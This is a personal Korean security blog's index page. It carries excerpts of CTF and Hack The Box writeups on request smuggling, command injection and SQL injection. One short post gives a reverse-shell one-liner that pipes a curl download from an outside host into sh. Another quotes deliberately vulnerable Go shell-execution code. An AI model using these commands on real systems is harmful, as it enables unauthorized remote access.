DOMDOM
0posts
today
total
personal posts · since 2021

Fragments
of a day.

A small notebook for slow moments slipping by.

2023 IT Creator
2024 Food Creator
2025 News Creator
2026 News Creator

Latest Posts최근

Security/Wargame

[CVE-2023-25690] Apache HTTP Server <= 2.4.55 mod_proxy enabled - HTTP Request Smuggling (HTB ApacheBlaze Writeup)

Introduction Apache HTTP Server 2.4.0 ~ 2.4.55 에서 mod_proxy 설정 시 HTTP Request Smuggling 취약점 발생 mod_proxy 설정 시 RewriteRule 이나 ProxyPassMatch 설정 시 사용자로부터 URL 데이터를 받아서 가변적으로 치환하는 경우 취약점이 발생한다. RewriteEngine on RewriteRule "^/products/(.*)" "http://product.example.com/products?$1"; [P] ProxyPassReverse /products/ http://product.example.com/ Request Splitting/Smuggling 취약점을 이용하면 프록시 서버의 접근 제어 정책을 우회하..

Security/Wargame

[Hackthebox] - [Web] Render Quest Writeup(문제풀이)

문제 이름: Render Quest 문제 유형: Web 문제 난이도: Easy 문제 설명: You've found a website that lets you input remote templates for rendering. Your task is to exploit this system's vulnerabilities to access and retrieve a hidden flag. Good luck! 취약한 코드 설명 func (p RequestData) FetchServerInfo(command string) string { out, err := exec.Command("sh", "-c", command).Output() if err != nil { return "" } return string(..

Security

[꿀팁]🤩리버스쉘(reverse shell) 쉽고 빠르게 여는 방법

1. [공격자 서버] NC Listening 2. [대상 서버] cURL Request curl 명령어 사용 예시 curl https://revsh.vercel.app/공격자서버IP주소:포트번호 | sh 3. [공격자 서버] Shell Received 리버스 쉘(Reverse Shell)을 빠르고 쉽게 획득하는 방법에 대해서 알아보았습니다. 공격자 서버에서는 단순히 nc 명령어로 소켓을 리스닝해주게 하였고, 공격 대상 서버에는 curl 명령어를 이용해서 특정 URL로 공격자의 IP주소와 포트번호를 입력해주었습니다. 그렇게 했더니 바로 쉘이 획득되는 것을 볼 수 있었는데요. 특정 URL에는 어떤 내용이 있길래 이런 동작이 가능한 것일까요? https://revsh.vercel.app/ 접속해보면 아시겠지만..

Security/CTF

[CTF] 도커(docker)로 CTF 문제 만들기 예시

단순하게 명령어를 입력받고 그 명령어 결과를 출력하는 코드를 main.py 로 만들었다고 가정하고, docker 파일 구성에 대해서 말씀드려보겠습니다. 참고용이며 이 틀을 기반으로 문제를 만드시면 되겠습니다. 반드시 socat을 이용하지 않더라도 xinetd, nc, socket programming 등을 이용해서 동일한 환경을 구축하실 수 있습니다. main.py #!/usr/bin/env python3 import subprocess if __name__ == '__main__': argument = input('Command: ') try: proc = subprocess.Popen(argument.split(' '),stdout=subprocess.PIPE,stderr=subprocess.PIPE..

Security/Wargame

[Hackthebox] - [Web] The Magic Informer Writeup(문제풀이)

문제 개요 The Magic Informer is the only byte-sized wizarding newspaper that brings the best magical news to you at your fingertips! Due to popular demand and bold headlines, we are often targeted by wizards and hackers alike. We need you to pentest our news portal and see if you can gain access to our server. 코드 분석 FLAG의 위치는 Dockerfile에서 찾을 수 있습니다. RUN gcc -o /readflag /readflag.c && chmod 4755 /re..

Security/Research

Quine SQL Injection, Quine Query, Quines in SQL 정리

A computer program that takes no input and produces a copy of its own source code as its only output. Quine 이란 소스코드를 그대로 출력으로 반환하는 프로그램을 의미합니다. 자세한 정의는 위키백과에서 참고해볼 수 있습니다. https://en.wikipedia.org/wiki/Quine_(computing) Quine (computing) - Wikipedia From Wikipedia, the free encyclopedia Self-replicating program A quine's output is exactly the same as its source code. (Note that the syntax highli..

Security/Wargame

[Hackthebox] - [Web] baby website rick Writeup(문제풀이)

문제 개요 Look Morty, look! I turned myself into a website Morty, I'm Website Rick babyyy!! But don't play around with some of them anti pickle serum I have stored somewhere safe, if I turn back to a human I'll have to go to family therapy and we don't want that Morty. 문제 분석 첫 화면에 위와 같이 나왔습니다. 이라고 나오는 문자열의 경우 파이썬에서 특정 클래스를 출력할 때 위와 같이 나옵니다. 그리고 pickle 이라는 단어를 봤을 때 python 의 pickle 모듈을 사용했을 것으로 유추되는 상..

Security/Wargame

[Hackthebox] - [Forensics] Wrong Spooky Season Writeup(문제풀이)

문제 개요 "I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong." Now there is an internal breach in the `Spooky Network` and you need to find out what happened. Analyze the the network traffic and find how the scary ghosts got in and what they did. 문제 풀이 프로토콜 계층 통계를..

Security/Wargame

[Hackthebox] WS-Todo Writeup(문제풀이)

이번에 정말 오랜만에 Hackthebox 에 Web Challenge 카테고리에 따끈따끈한 신규 문제가 출제되었다는 소식을 듣고 후다닥 가서 풀어보았는데요! 역시 명불허전 무척이나 흥미로운 문제였습니다. 옛날에 React 공부할 때 todo list 를 만들었던 기억이 새록새록 떠오르는데요. 이번 문제도 역시나 todo list 관련 문제였습니다... 근데 todo list 에 왠걸 관리자가 있네요? 엄청난 짬뽕 조합이 아닐 수 없습니다. 하지만 푸는 재미만 있으면 되니 그냥 풀어봅니다! 문제 개요 문제 설명 : This WebSockets-based Todo application features ✨millitary-grade encryption✨ and is extremely low-latency. I..

728x90
반응형
728x90
반응형

Thanks for staying up late.

keep wandering · keep listening